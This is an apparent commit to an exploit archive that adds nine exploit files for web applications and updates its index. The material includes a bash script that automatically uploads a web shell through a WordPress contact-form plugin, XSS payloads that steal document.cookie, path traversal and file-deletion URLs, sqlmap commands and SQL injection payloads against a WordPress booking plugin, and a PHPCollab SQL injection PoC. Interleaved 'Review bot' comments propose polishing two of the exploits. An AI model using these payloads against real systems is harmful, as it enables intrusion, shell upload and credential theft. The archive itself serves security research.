DB: 2015-05-14

9 new exploits
Offensive Security 2015-05-14 05:02:52 +00:00
parent d35a443cc5
commit c9501aad62
12 changed files with 718 additions and 35 deletions


@ -948,7 +948,7 @@ id,file,description,date,author,platform,type,port
1145,platforms/php/webapps/1145.pm,"Wordpress <= 1.5.1.3 - Remote Code Execution eXploit (metasploit)",2005-08-10,str0ke,php,webapps,0
1146,platforms/windows/remote/1146.c,"Microsoft Windows Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,windows,remote,139
1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec Remote File Access Exploit (windows)",2005-08-11,N/A,windows,remote,10000
1149,platforms/windows/remote/1149.c,"Microsoft Windows Plug-and-Play Service Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445
1149,platforms/windows/remote/1149.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445
1150,platforms/windows/remote/1150.pm,"ZENworks 6.5 Desktop/Server Management Remote Stack Overflow",2005-08-12,N/A,windows,remote,1761
1151,platforms/windows/remote/1151.pm,"MDaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow Exploit",2005-08-12,N/A,windows,remote,143
1152,platforms/windows/remote/1152.pm,"Novell eDirectory 8.7.3 iMonitor Remote Stack Overflow",2005-08-12,N/A,windows,remote,8008
@ -33245,7 +33245,7 @@ id,file,description,date,author,platform,type,port
36837,platforms/windows/local/36837.rb,"iTunes 10.6.1.7 - '.PLS' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0
36844,platforms/php/webapps/36844.txt,"WordPress <= 4.2 - Stored XSS",2015-04-27,klikki,php,webapps,0
36839,platforms/multiple/remote/36839.py,"MiniUPnPd 1.0 - Stack Overflow RCE for AirTies RT Series (MIPS)",2015-04-27,"Onur Alanbel (BGA)",multiple,remote,0
36840,platforms/multiple/local/36840.py,"Wireshark <=1.12.4 - Memory Corruption and Access Violation PoC",2015-04-27,"Avinash Thapa",multiple,local,0
36840,platforms/multiple/dos/36840.py,"Wireshark <=1.12.4 - Memory Corruption and Access Violation PoC",2015-04-27,"Avinash Thapa",multiple,dos,0
36841,platforms/windows/local/36841.py,"UniPDF Version 1.2 - 'xml' Buffer Overflow Crash PoC",2015-04-27,"Avinash Thapa",windows,local,0
36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0
36994,platforms/cgi/webapps/36994.txt,"WebGlimpse 2.18.7 'DOC' Parameter Directory Traversal Vulnerability",2009-04-17,MustLive,cgi,webapps,0
@ -33367,6 +33367,7 @@ id,file,description,date,author,platform,type,port
36976,platforms/cgi/webapps/36976.txt,"WebGlimpse 2.x 'wgarcmin.cgi' Path Disclosure Vulnerability",2012-03-18,Websecurity,cgi,webapps,0
36977,platforms/php/webapps/36977.pl,"CreateVision CreateVision CMS 'id' Parameter SQL Injection Vulnerability",2012-03-11,"Zwierzchowski Oskar",php,webapps,0
36978,platforms/hardware/webapps/36978.txt,"ZTE F660 - Remote Config Download",2015-05-11,"Daniel Cisa",hardware,webapps,0
36979,platforms/php/webapps/36979.sh,"Wordpress N-Media Website Contact Form with File Upload 1.3.4 - File Upload",2015-05-11,"Claudio Viviani & F17.c0de",php,webapps,0
36980,platforms/windows/local/36980.py,"VideoCharge Express 3.16.3.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
@ -33380,3 +33381,11 @@ id,file,description,date,author,platform,type,port
36992,platforms/php/webapps/36992.txt,"Wing FTP Server Admin <= 4.4.5 - CSRF Add Arbitrary User",2015-05-11,"John Page",php,webapps,0
36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Path Traversal Vulnerability",2015-05-11,"John Page",php,webapps,0
36996,platforms/unix/remote/36996.rb,"SixApart MovableType Storable Perl Code Execution",2015-05-12,metasploit,unix,remote,80
36997,platforms/php/webapps/36997.txt,"CMSimple 3.3 'index.php' Cross Site Scripting Vulnerability",2012-03-21,"Stefan Schurtz",php,webapps,0
36998,platforms/php/webapps/36998.txt,"Open Journal Systems (OJS) 2.3.6 /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php Multiple Parameter XSS",2012-03-21,"High-Tech Bridge",php,webapps,0
36999,platforms/php/webapps/36999.txt,"Open Journal Systems (OJS) 2.3.6 index.php authors[][url] Parameter XSS",2012-03-21,"High-Tech Bridge",php,webapps,0
37000,platforms/php/webapps/37000.txt,"Open Journal Systems (OJS) 2.3.6 /lib/pkp/classes/core/String.inc.php String::stripUnsafeHtml() Method XSS",2012-03-21,"High-Tech Bridge",php,webapps,0
37001,platforms/php/webapps/37001.txt,"Open Journal Systems (OJS) 2.3.6 Multiple Script Arbitrary File Upload",2012-03-21,"High-Tech Bridge",php,webapps,0
37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php param Parameter Multiple Function Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0
37003,platforms/php/webapps/37003.txt,"WordPress Booking Calendar Contact Form 1.0.2 - Multiple vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0
37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - SQL Injection",2015-05-13,"Wad Deek",php,webapps,0



@ -1,30 +0,0 @@
#!/usr/bin/python
# EXPLOIT TITLE: WIRESHARK <=1.12.4 Access Violation and Memory Corruption PoC
# AUTHOR: Avinash Kumar Thapa "-Acid"
# Date of Testing: 26th April'2015
# Vendor Homepage: http://www.wireshark.org
# Tested On : Windows 8.1 Pro
# Steps to Reproduce the Crash
# Step 1: Create a File Using PoC
# Step 2: Go to wirehshark and in filter field, put ip.addr=={Buffer}
# Step 3: Click "Apply"
# Some other places for the Crash are:
# Statistics > IP Statistics then any of the field you can use.
# Statistics > Packet Length > Paste the buffer in the field
# Statistics > ANCP
# Statistics > Collectd
# Statistics > Compared
# Statistis >
buffer = "A"*80000
file = open("wireshark.txt","w")
file.write(buffer)
file.close()
print "POC Created by -Acid"
print " Email: acid.exploit@gmail.com"

platforms/php/webapps/36979.sh Executable file

@ -0,0 +1,50 @@
#!/bin/bash
#
# Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4
# Google Dork : inurl:"/uploads/contact_files/"
# Exploit Author : Claudio Viviani
# Vulnerability discovered by : Claudio Viviani
# Script Written by : F17.c0de
# Software link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
# Version : 1.3.4
# Tested on : Kali Linux 1.1.0a / Curl 7.26.0
# Info: The "upload_file()" ajax function is affected from unrestircted file upload vulnerability
# Response : {"status":"uploaded","filename":"YOURSHELL"}
# Shell location http://VICTIM/wp-content/uploads/contact_files/YOURSHELL
echo '
+---------------------------------------------------------------+
| |
| Wordpress N-Media Website Contact Form with File Upload 1.3.4 |
| |
+---------------------------------------------------------------+
| |
| Script by : F17.c0de |
| Vuln Discovered by : Claudio Viviani |
| Date : 15.04.2015 |
| Google Dork : inurl:"/uploads/contact_files/" |
| Vulnerability : "upload_file()" on admin-ajax.php |
| Description : Auto shell uploader |
| |
+---------------------------------------------------------------+
| No System is Safe |
+---------------------------------------------------------------+
'
echo -n -e "Path of your shell: "
read bd
echo -n -e "Victim address [ex: http://www.victim.com]: "
read st
sleep 1
echo
echo "Uploading Shell. . ."
echo
curl -k -X POST -F "action=upload" -F "Filedata=@./$bd" -F "action=nm_webcontact_upload_file" $st/wp-admin/admin-ajax.php
echo
echo
echo "Job Finished"
echo
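Review bot: The header comment at the top of the file records the affected `"upload_file()"` ajax action, the tested version and the drop directory, but no fixed plugin version or vendor advisory, so a reader cannot judge whether a given install is still exposed; add `# Fixed in: [version — placeholder]` and `# Reference: [vendor advisory URL — placeholder]` under the `# Version : 1.3.4` line. A one-line defender note would also help, since the two facts it needs are already here: the request is a POST to `admin-ajax.php` carrying `action=nm_webcontact_upload_file`, and the result is a new file under `wp-content/uploads/contact_files/`, so a `# Detection:` comment pointing at those two indicators makes the advisory usable for monitoring as well. The `curl -k` on the upload line disables certificate verification, which the plain-http example target in the prompt does not need; it is worth a comment explaining why it is there, or dropping it.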


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52661/info
CMSimple is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
CMSimple 3.3 is vulnerable; other versions may also be affected.
http://www.example.com//cmsimple/cmsimplexh152/?'"</script><script>alert(document.cookie)</script>

platforms/php/webapps/36998.txt Executable file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/52666/info
Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input:
1. An arbitrary-file-deletion vulnerability
2. A security vulnerability
3. An arbitrary-file-upload vulnerability
4. Multiple cross-site scripting vulnerabilities
An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected.
http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php?editor=z&callb ack=x;};};alert%2834%29;{{&lang=en
http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugin s/ibrowser/ibrowser.php?editor=%27%29;};};alert%2834%29;{{a=x%28%27&callback=iBrowser_callback&a mp;lang=en

platforms/php/webapps/36999.txt Executable file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/52666/info
Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input:
1. An arbitrary-file-deletion vulnerability
2. A security vulnerability
3. An arbitrary-file-upload vulnerability
4. Multiple cross-site scripting vulnerabilities
An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected.
On the submissions page URL:
http://www.example.com/index.php/[journal]/author/submit/3?articleId=[id]
the attacker should add a malicious code to the "URL" field:
"><script>alert(document.cookie)</script>
the XSS will be displayed here:
http://www.example.com/index.php/[submission]/author/submission/[id]

platforms/php/webapps/37000.txt Executable file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/52666/info
Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input:
1. An arbitrary-file-deletion vulnerability
2. A security vulnerability
3. An arbitrary-file-upload vulnerability
4. Multiple cross-site scripting vulnerabilities
An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected.
On the following URL:
http://www.example.com/index.php/[journal]/author/submit/3?articleId=[id]
the attacker should inject malicious scripting code to the "Bio Statement" or "Abstract of Submission" fields:
<img src="x"/onerror=alert(document.cookie)>
or (browser specific):
<img style="width:expression(alert(document.cookie));"></a>
The stored XSS will be displayed here:
http://www.example.com/index.php/[submission]/author/submission/[id]

platforms/php/webapps/37001.txt Executable file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/52666/info
Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input:
1. An arbitrary-file-deletion vulnerability
2. A security vulnerability
3. An arbitrary-file-upload vulnerability
4. Multiple cross-site scripting vulnerabilities
An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected.
Malicious registered user shall start a new Submission:
http://www.example.com/index.php/[journal]/author/submit/1
on the second step of the Submission:
http://www.example.com/index.php/[journal]/author/submit/2?articleId=14
the user should upload test.pHp, test.asp, test.cgi, test.php3 or test.html file. The uploaded file will be available on the following URL:
http://www.example.com/files/journals/[journalid]/articles/[articleid]/submission/original/[newfilename]
The original file name will be changed, however it will be displayed to the user after upload (for example "16-28-1-SM.pHp"). File extension will remain the same.

platforms/php/webapps/37002.txt Executable file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/52666/info
Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input:
1. An arbitrary-file-deletion vulnerability
2. A security vulnerability
3. An arbitrary-file-upload vulnerability
4. Multiple cross-site scripting vulnerabilities
An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected.
http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=en& param=delete|/../../../../../../../../../../../../../../../../../../../temp/file_to_delete
Arbitrary File Renaming:
http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=en& param=rename|file.jpg|file.php%00.jpg
http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=en& param=rename|/../../../../../../../../../../../../../../../../../../../tmp/file_to_move|1x.jpg

platforms/php/webapps/37003.txt Executable file

@ -0,0 +1,526 @@
# Exploit Title: WordPress Booking Calendar Contact Form 1.0.2[Multiple
vulnerabilities]
# Date: 2015-05-01
# Google Dork: Index of
/wordpress/wp-content/plugins/booking-calendar-contact-form/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link:
http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Vendor: CodePeople.net
# Vebdor URI: http://codepeople.net
# Version: 1.0.2
# OWASP Top10: A1-Injection
# Tested on: windows 7 ultimate + firefox + sqlmap 0.9.
============================================
* Authenticated SQL injection
============================================
========================
Description
========================
In a site that has installed the plugin vulnerable and an attacker who has
an account
editor privileges can exploit the flaw SQL injection and possibly escalate
their privileges.
========================
Vulnerability
========================
vulnerable function code is located in dex_bcf.php
function dex_bccf_load_season_prices() {
global $wpdb;
if ( ! current_user_can('edit_pages') )
{
echo 'No enough privilegies to load this content.';
exit;
}
if (!defined('CP_BCCF_CALENDAR_ID'))
define ('CP_BCCF_CALENDAR_ID',$_GET["dex_item"]);
//.....vulnerable line
$codes = $wpdb->get_results( 'SELECT * FROM
'.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE
`cal_id`='.CP_BCCF_CALENDAR_ID);
$maxcosts = 0;
...
if (count ($codes))
{
... //Print results [bueno para seleccion mediante UNION]
foreach ($codes as $value)
{
echo '<tr>';
$price = explode(';',$value->price);
echo '<td>'.$price[0].'</td>';
for ($k=1; $k<=$maxcosts; $k++)
echo '<td>'.@$price[$k].'</td>';
echo '<td>'.substr($value->date_from,0,10).'</td>';
echo '<td>'.substr($value->date_to,0,10).'</td>';
echo '<td>[<a
href="javascript:dex_delete_season_price('.$value->id.')">Delete</a>]</td>';
echo '</tr>';
}
...
}
======================
Injection
======================
the following urls can be used to inject code.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1
------------------------
GET parameter vulnerable
------------------------
dex_item
========================
injection techniques:
========================
-> UNION BASED
-> TIME BASED BLIND
=======================
POC
=======================
Obtaining all available databases from mysql server with sqlmap.
---------------------------------------------------------------
python sqlmap.py --url="
http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1
"
-p dex_item --level=5 --risk=3 --cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE"
--dbms="mysql" --dbs
====================================================
=====================================================
* Filter bypass & Authenticated SQL injection
=====================================================
===============
Vulnerable code
================
function dex_bccf_calendar_delete($ret) {
global $wpdb;
$wpdb->query( "delete from ".TDE_BCCFCALENDAR_DATA_TABLE." where
id=".esc_sql($_POST["id"]) );
return $ret;
}
======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete
------------------------
POST parameter vulnerable
------------------------
id
========================
injection techniques:
========================
-> TIME BASED BLIND
=======================
POC
=======================
Obtaining all available databases from mysql server with sqlmap.
---------------------------------------------------------------
python sqlmap.py --url="
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete
"
--data="id=1" -p id --level=5 --risk=3
--cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE" --dbms="mysql" --dbs --technique T
====================================================
* Authenticated SQL injection
====================================================
===============
Vulnerable code
================
function dex_bccf_calendar_update($ret) {
global $wpdb;
dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "viadmin",
"varchar(10) DEFAULT '0' NOT NULL");
dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "color",
"varchar(10)");
$wpdb->query("update ".TDE_BCCFCALENDAR_DATA_TABLE." set
title='".esc_sql($_POST["title"])."',description='".esc_sql($_POST["description"])."',color='".esc_sql($_POST["color"])."'
where id=".esc_sql($_POST["id"]) );
return $ret;
}
======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit
------------------------
POST parameter vulnerable
------------------------
id
========================
injection techniques:
========================
-> BLIND
=======================
POC
=======================
(modifing all rows with "i0akiN" value and sleeping 5 seconds)
url
-------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit
----------
post data
----------
id=0 or 1=1 AND SLEEP(5) -- -
&tile=i0akiN&description=i0akiN&color=i0akiN
=====================================================
* Filter bypass & Authenticated SQL injection
=====================================================
===============
Vulnerable code
================
function dex_bccf_calendar_add($ret) {
global $wpdb;
$calid = str_replace (TDE_BCCFCAL_PREFIX, "",@$_GET["id"]);
...
$wpdb->query("insert into
".TDE_BCCFCALENDAR_DATA_TABLE."(viadmin,reservation_calendar_id,datatime_s,datatime_e,title,description,color)
".
"
values(1,".esc_sql($calid).",'".esc_sql($_POST["startdate"])."','".esc_sql($_POST["enddate"])."','".esc_sql($_POST["title"])."','"
.esc_sql($_POST["description"])."','".esc_sql($_POST["color"])."')");
..
}
======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add&id=[SQLi]
========================
injection techniques:
========================
-> Insertion data
=======================
POC
=======================
Insert a row into wp_bccf_reservation_calendars_data table without use
other post parameters
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add&
id=12,0x617373,0x617373,0x617373,0x617373,0x617373); -- -
====================================================
* Unauthenticated SQL injection
====================================================
=======================
Description
=======================
An attacker without autorization can send modified requests to database and
sensitive information
that can use for escalate privilegies and more...
======================
Vulnerability
======================
vulnerable function code is located in dex_bcf.php
function dex_bccf_caculate_price($startday, $enddate, $calendar,
$default_price) {
...
//$calendar is not sanitized in sql query
$codes = $wpdb->get_results( 'SELECT * FROM
'.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE
`cal_id`='.$calendar);
$mode =
(dex_bccf_get_option('calendar_mode',DEX_BCCF_DEFAULT_CALENDAR_MODE) ==
'false');
while (
(($enddate>$startday) && !$mode) ||
(($enddate>=$startday) && $mode)
)
{
$daily_price = $default_price;
$sprice = array();
foreach ($codes as $value)
{
$sfrom = strtotime($value->date_from);
$sto = strtotime($value->date_to);
if ($startday >= $sfrom && $startday <= $sto)
{
$sprice = explode (';', $value->price);
$daily_price = $sprice[0];
}
}
$season_prices[] = $sprice;
$price += $daily_price;
$startday = strtotime (date("Y-m-d", $startday)." +1 day");
//60*60*24;
$days++;
}
...
}
======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/?action=dex_bccf_check_posted_data&dex_bccf=getcost
------------------------
post variable vulnerable
------------------------
dex_item=1
========================
injection techniques:
========================
-> UNION BASED <- yeaahh!!
-> TIME BASED BLIND
-> BOOLEAN BASED BLIND
========================
POC
========================
Obtaining all available databases from mysql server with sqlmap.
python sqlmap.py --url="
http://localhost/wordpress/?action=dex_bccf_check_posted_data&dex_bccf=getcost
"
--data="dex_item=1" -p dex_item --level=5 --risk=3 --dbms="mysql" --dbs
--tecnique U
===========================================================
============================================================
* Unauthenticated SQL injection 2
============================================================
========================
Description
========================
The following function is also vulnerable to SQL injection because usually
the variable
CP_BCCF_CALENDAR_ID it equals the content of POST ['dex_item'] or GET
['dex_item'] Besides this function is used in several places
the code.
========================
Vulnerability
========================
Vulnerable function:
function dex_bccf_get_option ($field, $default_value)
{
global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id;
if (!defined("CP_BCCF_CALENDAR_ID"))
return $default_value;
if ($dex_option_buffered_id == CP_BCCF_CALENDAR_ID)
$value = @$dex_option_buffered_item->$field;
else
{
//....vulnerable line
$myrows = $wpdb->get_results( "SELECT * FROM
".DEX_BCCF_CONFIG_TABLE_NAME." WHERE id=".CP_BCCF_CALENDAR_ID );
$value = @$myrows[0]->$field;
$dex_option_buffered_item = $myrows[0];
$dex_option_buffered_id = CP_BCCF_CALENDAR_ID;
}
if ($value == '' && $dex_option_buffered_item->calendar_language == '')
$value = $default_value;
return $value;
}
##########################################
======================================
* CAPTCHA BYPASS & ROW INSERTION
======================================
==============
DESCRIPTION
==============
An attacker can manipulate some variables for bypass conditional staments.
For example: insert unlimited rows into
table (could use a program)
=============
... HOW?
=============
An attacker encodes parameter GET['hdcaptcha_dex_bccf_post'] to MD5
encryption saving into value of
"rand_code" cookie.
==========
POC
==========
REQUEST
-----------
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&hdcaptcha_dex_bccf_post=1&
dex_item=1&
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&
hdcaptcha_dex_bccf_post=1&dex_item=1&hdcaptcha_dex_bccf_post=joaquin
^
-------------- |
POST VARIABLES
--------------
hdcaptcha_dex_bccf_post=1
-------
COOKIES
-------
rand_code=a6beca7f198112079f836a4e67cf4821 <---joaquin MD5 encrypted
===========================
VULNERABLE FUNCTION CODE
==========================
function dex_bccf_check_posted_data(){
....
if (!isset($_GET['hdcaptcha_dex_bccf_post'])
||$_GET['hdcaptcha_dex_bccf_post'] == '') $_GET['hdcaptcha_dex_bccf_post']
= @$_POST['hdcaptcha_dex_bccf_post'];
if (
(dex_bccf_get_option('dexcv_enable_captcha',
TDE_BCCFDEFAULT_dexcv_enable_captcha) != 'false') &&
( (strtolower($_GET['hdcaptcha_dex_bccf_post']) !=
strtolower($_SESSION['rand_code'])) ||
($_SESSION['rand_code'] == '')
)
&&
( (md5(strtolower($_GET['hdcaptcha_dex_bccf_post'])) !=
($_COOKIE['rand_code'])) ||
($_COOKIE['rand_code'] == '')
)
)
{
$_SESSION['rand_code'] = '';
echo 'captchafailed';
exit;
}
// if this isn't the real post (it was the captcha verification) then echo
ok and exit
if ( 'POST' != $_SERVER['REQUEST_METHOD'] || ! isset(
$_POST['dex_bccf_post'] ) )
{
echo 'ok';
exit;
}
...
}
###########################################
=======================================
* Persistent JS/HTML code injection
=======================================
========================
Description:
========================
Un atacante sin autenticacion puede inyectar codigo malicioso que podria
ejecutar el navegador
de la victima(could be an administrator). Cuando la victima visite la
pagina modificada, el atacante
podria robar datos y/o controlar las acciones de la victima de forma remota.
========================
Vulnerability
========================
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data
POST-DATA
dex_item=2
dex_bccf_post_options=1
email_confirmation_to_user=%3C%2Ftextarea%3E CUSTOM JS/HTML INYECTION
%3Ctextarea%3E
email_notification_to_admin=%3C%2Ftextarea%3E CUSTOM JS/HTML INYECTION
%3Ctextarea%3E
Parameters email_confirmation_to_user,email_notification_to_admin not
filtered and is included in admin page
====================
VULNERABLE FUNCTION
====================
dex_bccf_save_options() located in dex_bccf.php
save unfiltered post data
#########################################

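--- /dev/null
+++ b/platforms/php/webapps/37004.txt
@@ -0,0 +1,26 @@
+# Exploit Title: PHPCollab 2.5 - SQL Injection
+# Google Dork: filetype:php inurl:"/general/login.php?PHPSESSID="
+# Date: 13/05/2015
+# Exploit Author: Wad Deek
+# Vendor Homepage: http://www.phpcollab.com/
+# Software Link: http://sourceforge.net/projects/phpcollab/files/final/2.5/
+# Version: 2.5
++>2.5<+ --> /docs/changes.txt
++>2.5<+ --> /docs/readme.txt
+# Tested on: Xampp on Windows7
+###################################################################################
+PoC = http://127.0.0.1/phpcollab/topics/deletetopics.php?project=%27
+###################################################################################
+#=====================================================
+require('mechanize')
+agent = Mechanize.new()
+agent.redirect_ok = false
+agent.verify_mode = OpenSSL::SSL::VERIFY_NONE
+#=====================================================
+begin
+html = agent.get("http://127.0.0.1/phpcollab/topics/deletetopics.php?project=%27")
+rescue
+else
+puts(html.body())
+end
+#=====================================================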
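Review bot: The bare `rescue` on the line after the `agent.get` call has an empty body, so a connection failure or an error response from the server (which Mechanize presumably raises, as the `else` branch suggests) is swallowed and the script prints nothing, which is indistinguishable from an empty page; `rescue StandardError => e` followed by `warn(e.message)` would make the outcome explicit. `agent.verify_mode = OpenSSL::SSL::VERIFY_NONE` disables certificate checking for what is a plain-http URL and is not needed here. The header names the affected script and parameter but not a fixed release; a `# Fixed in: [version — placeholder]` line under `# Version: 2.5` would let a reader judge exposure.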


@ -431,6 +431,6 @@ main (int argc, char **argv)
recv(sockfd, recvbuf, 4096, 0);
return 0;
}
// milw0rm.com [2005-08-12]
}
// milw0rm.com [2005-08-12]